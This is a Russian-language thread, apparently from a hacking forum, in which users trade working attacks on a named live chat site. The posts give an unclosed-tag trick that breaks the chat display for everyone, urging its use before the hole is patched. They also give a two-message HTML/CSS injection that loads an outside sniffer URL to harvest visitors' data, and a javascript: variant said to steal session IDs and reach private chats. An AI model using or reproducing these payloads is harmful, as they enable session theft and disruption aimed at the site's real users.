|
www.gaychat.ru - заходите. регистрируетесь. входите в чат. и пишите что то типа
текст <font face=webdings> <font/><font/><font/><font/> *<font/> - столько сколько хватит строки ввода. эффект получается за счет не закрытого тэга фонта.. это надо видетьhttp://forum.antichat.ru/iB_html/non...cons/smile.gif) оччень эффектно!http://forum.antichat.ru/iB_html/non...cons/smile.gif) когда все последующие сообщения после вашего идут не слова и картинкиhttp://forum.antichat.ru/iB_html/non...cons/smile.gif) стоит повторить несколько раз подряд для достижения лучшего результата. и немного изменяйте фразу а то софт не пропускает одинаковые сообщения несколько раз подряд. еще так же можно хделать тэги курсива и жирного шрифта. в других чатах не пробовал... можно получится. Юзайте пока дырку не прикрылиhttp://forum.antichat.ru/iB_html/non...cons/smile.gif) |
Нда... любопытный чатик....
Но ломается он намного круче чем просто глюки с фонтом.. Например его можно сниферить: В два этапа , сначала посылем такое сообщение: </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE"><a href="http://dsds.ds/?"a=`>input fdfs</a>[/QUOTE]<span id='postcolor'> И сразу же за ним еще одно: </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">` fe fd style = `background :url(http://www.hackzone.ru/cgi-bin/sniff.cgi?Algol)` [/QUOTE]<span id='postcolor'> (сообщения нужно посылать именно такие, "лишние" пробелы не удалять !http://forum.antichat.ru/iB_html/non...icons/wink.gif Результат как говорится на лице .... (вернее в логе хакзоны, а для тех кто в танке: лог хак зоны http://www.hackzone.ru/files/snifflog.txt) |
гмм... оригинално!:))
ну если как бэк можно вставить любой? урл, тооо... получается можно и скрипт какой то вставить или нет? оччень очень интересная идЭя... :) |
ты видимо не читал мои статьи, поэтому тебе кажется это оригинальным...
На самом деле это старая технология , приспособленная к особенностям данного чата. А насчет скриптов - как ты правильно понял если можно вставить снифер, то можно вставить и скрипт, и узнать номера сессий, и кикнуть , и залезть в приват.. В общем по полной программе.... Для вставки скрипта вместо второго сообщения можно послать например : </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">` fe fd style = `background :url(javascript:alert())` [/QUOTE]<span id='postcolor'> Только советую эксперементирвать в привате , дабы не шокировать публику ... |
а можно через скрипт менять размер шрифта? иль картинку вставлять?
|
ПРИВЕТ ВСЕМ
|
| Время: 12:51 |